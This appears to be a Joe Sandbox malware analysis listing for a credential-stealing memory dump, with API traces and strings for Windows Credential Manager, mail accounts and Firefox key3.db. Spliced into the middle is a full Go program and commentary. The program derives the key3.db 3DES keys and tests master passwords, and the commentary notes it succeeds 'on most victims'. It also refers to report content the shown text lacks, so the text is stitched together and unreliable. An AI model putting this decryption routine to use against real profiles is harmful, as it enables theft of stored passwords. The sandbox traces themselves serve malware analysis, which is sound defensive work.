• Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
• Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
• Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
• Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: _mbscat$memsetsprintf
• String ID: %2.2X
• API String ID: 125969286-791839006
• Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
• Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
• Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
• Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
APIs
• GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
• ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
• SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
  • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
  • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
  • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
  • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
  • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
  • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
  • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
• ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
• CloseHandle.KERNEL32(?), ref: 00444206
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: File$??2@??3@$ByteCharCloseHandleMultiPointerReadSizeWidememcpystrlenwcslen
• String ID: ACD
• API String ID: 82305771-620537770
• Opcode ID: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
• Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
• Opcode Fuzzy Hash: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
• Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
APIs
• memset.MSVCRT ref: 004091EC
• sprintf.MSVCRT ref: 00409201
  • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
  • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
  • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
• SetWindowTextA.USER32(?,?), ref: 00409228
• EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
• String ID: caption$dialog_%d
• API String ID: 2923679083-4161923789
• Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
• Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
• Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
• Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
• memset.MSVCRT ref: 00410246
• memset.MSVCRT ref: 00410258
  • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
• memset.MSVCRT ref: 0041033F
• _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
• CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memset$_mbscpy$CloseHandleOpenProcess
• String ID:
• API String ID: 3974772901-0
• Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
• Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
• Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
• Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
APIs
• wcslen.MSVCRT ref: 0044406C
• ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
• WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
• strlen.MSVCRT ref: 004440D1
                                                                                                                                                  • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                                                  • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                                                                • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 577244452-0
                                                                                                                                                • Opcode ID: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                                                                                • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                                                                • Opcode Fuzzy Hash: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                                                                                • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                • _strcmpi.MSVCRT ref: 00404536
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strcmpi$memcpystrlen
                                                                                                                                                • String ID: imap$pop3$smtp
                                                                                                                                                • API String ID: 2025310588-821077329
                                                                                                                                                • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                                                • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                                                • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                                                • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040C02D
                                                                                                                                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                  • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                  • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                                                  • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                                                  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                                                  • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                                                  • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                  • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                • API String ID: 2726666094-3614832568
                                                                                                                                                • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                                                • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                                                • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                                                • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                                                APIs
                                                                                                                                                • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                                                                  • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                                                                  • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                                                  • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                                                                • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                                                                • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                                                                • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcmp$memcpy
                                                                                                                                                • String ID: global-salt$password-check
                                                                                                                                                • API String ID: 231171946-3927197501
                                                                                                                                                • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                                                                • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
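The function above compares record keys against "global-salt" (0x0B bytes) and "password-check" (0x0E bytes). Those are the two key3.db entries a Firefox/Thunderbird master-password recovery routine needs, which fits the WebBrowserPassView detection listed at the top of this report. The listing shows only the string compares; it does not show the derivation itself. As an added illustration, not code from the sample or from Joe Sandbox, the following Go program reproduces the publicly documented legacy NSS key3.db scheme (SHA-1 and HMAC-SHA-1 yielding a 3DES-CBC key and IV) and the password-check test that a recovery tool runs before touching any stored login. Go is used because its standard library ships 3DES. The salt, password and ciphertext in main and the Encrypt3DESCBC helper are constructed for the demonstration; parsing the Berkeley DB records out of key3.db is not shown.

```go
package main

import (
	"bytes"
	"crypto/cipher"
	"crypto/des"
	"crypto/hmac"
	"crypto/sha1"
	"errors"
	"fmt"
)

// sha1Concat returns SHA-1 over the concatenation of its arguments.
func sha1Concat(parts ...[]byte) []byte {
	h := sha1.New()
	for _, p := range parts {
		h.Write(p)
	}
	return h.Sum(nil)
}

// DeriveKey3 is the legacy NSS key3.db key schedule.
//   globalSalt     value stored under the "global-salt" key of key3.db
//   masterPassword the user's master password; empty when none was set
//   entrySalt      per-record salt of the record being decrypted
// It returns the 24-byte 3DES key and the 8-byte CBC IV.
func DeriveKey3(globalSalt, masterPassword, entrySalt []byte) (key, iv []byte) {
	hp := sha1Concat(globalSalt, masterPassword)
	pes := make([]byte, sha1.Size) // entry salt zero-padded to 20 bytes
	copy(pes, entrySalt)
	chp := sha1Concat(hp, entrySalt)

	mac := func(parts ...[]byte) []byte { // HMAC-SHA-1 keyed with chp
		m := hmac.New(sha1.New, chp)
		for _, p := range parts {
			m.Write(p)
		}
		return m.Sum(nil)
	}
	k1 := mac(pes, entrySalt)
	tk := mac(pes)
	k2 := mac(tk, entrySalt)

	k := make([]byte, 0, 2*sha1.Size) // 40 bytes of key material
	k = append(k, k1...)
	k = append(k, k2...)
	return k[:24], k[len(k)-8:]
}

// Decrypt3DESCBC decrypts whole blocks and leaves the padding in place so the
// caller can inspect it, which is exactly what the password-check test does.
func Decrypt3DESCBC(key, iv, ct []byte) ([]byte, error) {
	if len(ct) == 0 || len(ct)%des.BlockSize != 0 {
		return nil, errors.New("ciphertext is not a whole number of 3DES blocks")
	}
	block, err := des.NewTripleDESCipher(key)
	if err != nil {
		return nil, err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	return pt, nil
}

// Encrypt3DESCBC is the inverse; it exists only to build constructed test
// vectors, since a real key3.db already holds the ciphertext.
func Encrypt3DESCBC(key, iv, pt []byte) ([]byte, error) {
	if len(pt) == 0 || len(pt)%des.BlockSize != 0 {
		return nil, errors.New("plaintext must be padded to the 3DES block size")
	}
	block, err := des.NewTripleDESCipher(key)
	if err != nil {
		return nil, err
	}
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, pt)
	return ct, nil
}

// PasswordCheckPlaintext is what the "password-check" record decrypts to when
// the master password is right: the ASCII string plus two PKCS#7 pad bytes.
var PasswordCheckPlaintext = []byte("password-check\x02\x02")

// CheckMasterPassword derives the record key for a candidate password and
// compares the decrypted bytes against the expected marker.
func CheckMasterPassword(globalSalt, masterPassword, entrySalt, ct []byte) bool {
	key, iv := DeriveKey3(globalSalt, masterPassword, entrySalt)
	pt, err := Decrypt3DESCBC(key, iv, ct)
	if err != nil {
		return false
	}
	return bytes.Equal(pt, PasswordCheckPlaintext)
}

func main() {
	// Constructed sample values; a real run reads them from key3.db.
	globalSalt := []byte("0123456789abcdefghij")
	entrySalt := []byte("constructed-salt")
	password := []byte("hunter2")
	key, iv := DeriveKey3(globalSalt, password, entrySalt)
	ct, err := Encrypt3DESCBC(key, iv, PasswordCheckPlaintext)
	if err != nil {
		fmt.Println("could not build sample record:", err)
		return
	}
	fmt.Println("correct password accepted:", CheckMasterPassword(globalSalt, password, entrySalt, ct))
	fmt.Println("wrong password accepted:  ", CheckMasterPassword(globalSalt, []byte("wrong"), entrySalt, ct))
	fmt.Println("empty password accepted:  ", CheckMasterPassword(globalSalt, nil, entrySalt, ct))
}
```

The empty-password case matters in practice: a profile with no master password set still stores a password-check record, and it validates with an empty string, which is why tools of this kind succeed silently on most victims. The same DeriveKey3 output, with each login record's own entry salt, is what unlocks the individual credentials.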
                                                                                                                                                APIs
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                                                                                                • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                                                                • Opcode Fuzzy Hash: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                                                                                                • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                                                                APIs
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                                                                • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                                                                • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                                                                • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                                                                • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                                                                • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 19018683-0
                                                                                                                                                • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                                                                • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040644F
                                                                                                                                                • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                                                  • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                  • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                                                                • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                                                                • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                                                                • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                                                  • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                                                                Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$memset
• String ID:
• API String ID: 438689982-0
• Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
• Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
• Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
• Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
APIs
  • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
• strlen.MSVCRT ref: 0040F7BE
• _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
• LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
• String ID: Passport.Net\*
• API String ID: 2329438634-3671122194
• Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
• Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
• Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
• Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
APIs
  • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
• memset.MSVCRT ref: 0040330B
• GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
• strchr.MSVCRT ref: 0040335A
  • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
• strlen.MSVCRT ref: 0040339C
  • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
• String ID: Personalities
• API String ID: 2103853322-4287407858
• Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
• Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
• Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
• Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memset
• String ID: H
• API String ID: 2221118986-2852464175
• Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
• Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
• Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
• Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy
• String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
• API String ID: 3510742995-3170954634
• Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
• Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
• Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
• Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$memset
• String ID: winWrite1$winWrite2
• API String ID: 438689982-3457389245
• Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
• Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
• Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
